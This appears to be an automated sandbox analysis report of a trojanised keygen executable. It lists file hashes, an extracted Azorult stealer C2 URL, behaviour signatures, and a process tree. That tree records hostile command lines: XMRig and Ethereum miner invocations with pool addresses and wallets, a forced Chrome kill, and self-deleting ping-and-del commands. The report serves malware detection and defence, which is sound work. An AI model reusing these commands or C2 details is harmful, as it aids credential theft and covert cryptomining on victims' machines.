Analysis

  • max time kernel
    27s
  • max time network
    63s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    04-04-2021 11:41

General

  • Target

    Printhelp_3_0_90_keygen_by_KeygenNinja.exe

  • Size

    5.2MB

  • MD5

    ca3728b14865976c4f39d4b1dd058d4b

  • SHA1

    41f57c0b052b0ac3a276463f6c09085efb049153

  • SHA256

    829a3cefee8046496eb6bc03b2009891bec987a01ebe652bacc42292cf892418

  • SHA512

    eabceb4164f54c8332da402ec6f5b91776dedc1b2a4ea1491217a3fed1d4f54bde5863605cbec7910f04f4265a2a9ae8b6dd95aad0ba3dba1ec6a0a26ee217e9

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 4 IoCs
  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Printhelp_3_0_90_keygen_by_KeygenNinja.exe
    "C:\Users\Admin\AppData\Local\Temp\Printhelp_3_0_90_keygen_by_KeygenNinja.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2228
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:2912
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:192
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2380
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:512
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:3952
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3720
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2188
            • C:\Users\Admin\AppData\Local\Temp\KZQ3OLVSLC\multitimer.exe
              "C:\Users\Admin\AppData\Local\Temp\KZQ3OLVSLC\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
              5⤵
              • Executes dropped EXE
              PID:2108
              • C:\Users\Admin\AppData\Local\Temp\KZQ3OLVSLC\multitimer.exe
                "C:\Users\Admin\AppData\Local\Temp\KZQ3OLVSLC\multitimer.exe" 1 3.1617536537.6069a619cbe21 101
                6⤵
                  PID:4560
                  • C:\Users\Admin\AppData\Local\Temp\KZQ3OLVSLC\multitimer.exe
                    "C:\Users\Admin\AppData\Local\Temp\KZQ3OLVSLC\multitimer.exe" 2 3.1617536537.6069a619cbe21
                    7⤵
                      PID:5068
                      • C:\Users\Admin\AppData\Local\Temp\ip3r3mhf3er\c0wzai0amop.exe
                        "C:\Users\Admin\AppData\Local\Temp\ip3r3mhf3er\c0wzai0amop.exe" /VERYSILENT
                        8⤵
                          PID:4816
                          • C:\Users\Admin\AppData\Local\Temp\is-KLNQ9.tmp\c0wzai0amop.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-KLNQ9.tmp\c0wzai0amop.tmp" /SL5="$40190,2592217,780800,C:\Users\Admin\AppData\Local\Temp\ip3r3mhf3er\c0wzai0amop.exe" /VERYSILENT
                            9⤵
                              PID:4312
                          • C:\Users\Admin\AppData\Local\Temp\rjsxj35zt5f\vict.exe
                            "C:\Users\Admin\AppData\Local\Temp\rjsxj35zt5f\vict.exe" /VERYSILENT /id=535
                            8⤵
                              PID:4132
                              • C:\Users\Admin\AppData\Local\Temp\is-CLJPE.tmp\vict.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-CLJPE.tmp\vict.tmp" /SL5="$10304,870426,780800,C:\Users\Admin\AppData\Local\Temp\rjsxj35zt5f\vict.exe" /VERYSILENT /id=535
                                9⤵
                                  PID:2108
                              • C:\Users\Admin\AppData\Local\Temp\qwagjbnqdjs\cpyrix.exe
                                "C:\Users\Admin\AppData\Local\Temp\qwagjbnqdjs\cpyrix.exe" /VERYSILENT
                                8⤵
                                  PID:4260
                                • C:\Users\Admin\AppData\Local\Temp\iamflctwpkf\Setup3310.exe
                                  "C:\Users\Admin\AppData\Local\Temp\iamflctwpkf\Setup3310.exe" /Verysilent /subid=577
                                  8⤵
                                    PID:4632
                                  • C:\Users\Admin\AppData\Local\Temp\tyjkzzbahgw\qovjllktgjo.exe
                                    "C:\Users\Admin\AppData\Local\Temp\tyjkzzbahgw\qovjllktgjo.exe" /ustwo INSTALL
                                    8⤵
                                      PID:5216
                                    • C:\Users\Admin\AppData\Local\Temp\roali021egj\vpn.exe
                                      "C:\Users\Admin\AppData\Local\Temp\roali021egj\vpn.exe" /silent /subid=482
                                      8⤵
                                        PID:5376
                                        • C:\Users\Admin\AppData\Local\Temp\is-JBO2S.tmp\vpn.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-JBO2S.tmp\vpn.tmp" /SL5="$302E4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\roali021egj\vpn.exe" /silent /subid=482
                                          9⤵
                                            PID:5428
                                  • C:\Users\Admin\AppData\Local\Temp\YXZE8EKOEC\setups.exe
                                    "C:\Users\Admin\AppData\Local\Temp\YXZE8EKOEC\setups.exe" ll
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    • Suspicious use of WriteProcessMemory
                                    PID:2904
                                    • C:\Users\Admin\AppData\Local\Temp\is-SNIM7.tmp\setups.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-SNIM7.tmp\setups.tmp" /SL5="$60058,454998,229376,C:\Users\Admin\AppData\Local\Temp\YXZE8EKOEC\setups.exe" ll
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2752
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:2472
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c taskkill /f /im chrome.exe
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:544
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im chrome.exe
                                      6⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2612
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious use of WriteProcessMemory
                                  PID:4120
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                    5⤵
                                      PID:4188
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                        6⤵
                                          PID:4528
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:4212
                                      • C:\Users\Admin\AppData\Roaming\C0D5.tmp.exe
                                        "C:\Users\Admin\AppData\Roaming\C0D5.tmp.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:4340
                                        • C:\Windows\system32\msiexec.exe
                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                          6⤵
                                            PID:4596
                                          • C:\Windows\system32\msiexec.exe
                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                                            6⤵
                                              PID:4916
                                          • C:\Users\Admin\AppData\Roaming\C26C.tmp.exe
                                            "C:\Users\Admin\AppData\Roaming\C26C.tmp.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            PID:4440
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                            5⤵
                                              PID:4660
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1
                                                6⤵
                                                • Runs ping.exe
                                                PID:4224
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
                                            4⤵
                                              PID:4732
                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                        1⤵
                                        • Drops file in Windows directory
                                        • Modifies registry class
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2240
                                      • C:\Windows\system32\browser_broker.exe
                                        C:\Windows\system32\browser_broker.exe -Embedding
                                        1⤵
                                          PID:3520
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                          1⤵
                                            PID:4712
                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                            1⤵
                                              PID:4000
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                                PID:4160
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                  PID:4156
                                                • C:\Users\Admin\AppData\Local\Temp\is-KFEQQ.tmp\Setup3310.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-KFEQQ.tmp\Setup3310.tmp" /SL5="$102DE,138429,56832,C:\Users\Admin\AppData\Local\Temp\iamflctwpkf\Setup3310.exe" /Verysilent /subid=577
                                                  1⤵
                                                    PID:4560

                                                  Network

                                                  MITRE ATT&CK Enterprise v6

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • memory/68-137-0x000001485C570000-0x000001485C5D7000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/636-103-0x000001DC3D240000-0x000001DC3D2A7000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/636-91-0x000001DC3D180000-0x000001DC3D1C4000-memory.dmp

                                                    Filesize

                                                    272KB

                                                  • memory/856-113-0x0000027891B70000-0x0000027891BD7000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/1068-107-0x0000018D98A70000-0x0000018D98AD7000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/1160-124-0x000001D142DD0000-0x000001D142E37000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/1240-130-0x000001E1C4980000-0x000001E1C49E7000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/1436-116-0x0000022D05810000-0x0000022D05877000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/1896-121-0x000001DA6BE90000-0x000001DA6BEF7000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/2108-54-0x0000000002F40000-0x0000000002F42000-memory.dmp

                                                    Filesize

                                                    8KB

                                                  • memory/2108-44-0x0000000002F50000-0x00000000038F0000-memory.dmp

                                                    Filesize

                                                    9.6MB

                                                  • memory/2108-177-0x0000000000720000-0x0000000000721000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/2188-24-0x00007FF98ACC0000-0x00007FF98B6AC000-memory.dmp

                                                    Filesize

                                                    9.9MB

                                                  • memory/2188-25-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/2188-30-0x0000000001010000-0x0000000001012000-memory.dmp

                                                    Filesize

                                                    8KB

                                                  • memory/2228-29-0x0000000002E30000-0x0000000002FCC000-memory.dmp

                                                    Filesize

                                                    1.6MB

                                                  • memory/2428-139-0x0000017412380000-0x00000174123E7000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/2444-141-0x000001F1587A0000-0x000001F158807000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/2684-134-0x0000022A07940000-0x0000022A079A7000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/2696-133-0x000001EAB47B0000-0x000001EAB4817000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/2752-52-0x00000000038B1000-0x00000000038DC000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/2752-53-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/2752-47-0x0000000003281000-0x0000000003285000-memory.dmp

                                                    Filesize

                                                    16KB

                                                  • memory/2752-57-0x00000000038F1000-0x00000000038F8000-memory.dmp

                                                    Filesize

                                                    28KB

                                                  • memory/2840-110-0x000002CD520A0000-0x000002CD52107000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/2904-48-0x0000000000401000-0x000000000040C000-memory.dmp

                                                    Filesize

                                                    44KB

                                                  • memory/4212-67-0x0000000000560000-0x000000000056D000-memory.dmp

                                                    Filesize

                                                    52KB

                                                  • memory/4212-81-0x0000000000400000-0x0000000000448000-memory.dmp

                                                    Filesize

                                                    288KB

                                                  • memory/4312-173-0x00000000008C0000-0x00000000008C1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4440-156-0x00000000076C0000-0x000000000CB3C000-memory.dmp

                                                    Filesize

                                                    84.5MB

                                                  • memory/4528-88-0x0000000000630000-0x000000000066A000-memory.dmp

                                                    Filesize

                                                    232KB

                                                  • memory/4528-89-0x0000000004220000-0x0000000004276000-memory.dmp

                                                    Filesize

                                                    344KB

                                                  • memory/4560-147-0x0000000000510000-0x0000000000512000-memory.dmp

                                                    Filesize

                                                    8KB

                                                  • memory/4560-191-0x00000000050A0000-0x00000000050A1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-198-0x0000000005110000-0x0000000005111000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-197-0x0000000005100000-0x0000000005101000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-196-0x00000000050F0000-0x00000000050F1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-195-0x00000000050E0000-0x00000000050E1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-194-0x00000000050D0000-0x00000000050D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-145-0x00000000020A0000-0x0000000002A40000-memory.dmp

                                                    Filesize

                                                    9.6MB

                                                  • memory/4560-193-0x00000000050C0000-0x00000000050C1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-192-0x00000000050B0000-0x00000000050B1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-190-0x0000000005090000-0x0000000005091000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-189-0x0000000005080000-0x0000000005081000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-188-0x0000000005070000-0x0000000005071000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-187-0x0000000005050000-0x0000000005051000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-181-0x0000000005060000-0x0000000005061000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-186-0x0000000005040000-0x0000000005041000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-182-0x00000000024C0000-0x00000000024C1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-185-0x0000000005030000-0x0000000005031000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-183-0x0000000005020000-0x0000000005021000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-180-0x00000000024B0000-0x00000000024B1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-179-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/4560-178-0x00000000023F1000-0x000000000241C000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/4596-86-0x0000000140000000-0x0000000140383000-memory.dmp

                                                    Filesize

                                                    3.5MB

                                                  • memory/4596-140-0x0000000140000000-0x0000000140383000-memory.dmp

                                                    Filesize

                                                    3.5MB

                                                  • memory/4632-174-0x0000000000401000-0x000000000040B000-memory.dmp

                                                    Filesize

                                                    40KB

                                                  • memory/4712-155-0x000002E02F400000-0x000002E02F506000-memory.dmp

                                                    Filesize

                                                    1.0MB

                                                  • memory/4712-135-0x000002E02CF50000-0x000002E02CFB7000-memory.dmp

                                                    Filesize

                                                    412KB

                                                  • memory/4816-171-0x0000000000401000-0x00000000004B7000-memory.dmp

                                                    Filesize

                                                    728KB

                                                  • memory/4916-125-0x0000000140000000-0x000000014070A000-memory.dmp

                                                    Filesize

                                                    7.0MB

                                                  • memory/4916-104-0x0000000140000000-0x000000014070A000-memory.dmp

                                                    Filesize

                                                    7.0MB

                                                  • memory/4916-119-0x0000021E695D0000-0x0000021E695E4000-memory.dmp

                                                    Filesize

                                                    80KB

                                                  • memory/4916-142-0x0000000140000000-0x000000014070A000-memory.dmp

                                                    Filesize

                                                    7.0MB

                                                  • memory/4916-146-0x0000021E69620000-0x0000021E69640000-memory.dmp

                                                    Filesize

                                                    128KB

                                                  • memory/5068-154-0x0000000002400000-0x0000000002402000-memory.dmp

                                                    Filesize

                                                    8KB

                                                  • memory/5068-151-0x0000000002410000-0x0000000002DB0000-memory.dmp

                                                    Filesize

                                                    9.6MB

                                                  • memory/5216-199-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/5216-201-0x0000000001B20000-0x0000000001B6C000-memory.dmp

                                                    Filesize

                                                    304KB

                                                  • memory/5216-202-0x0000000000400000-0x0000000000450000-memory.dmp

                                                    Filesize

                                                    320KB

                                                  • memory/5376-203-0x0000000000401000-0x0000000000417000-memory.dmp

                                                    Filesize

                                                    88KB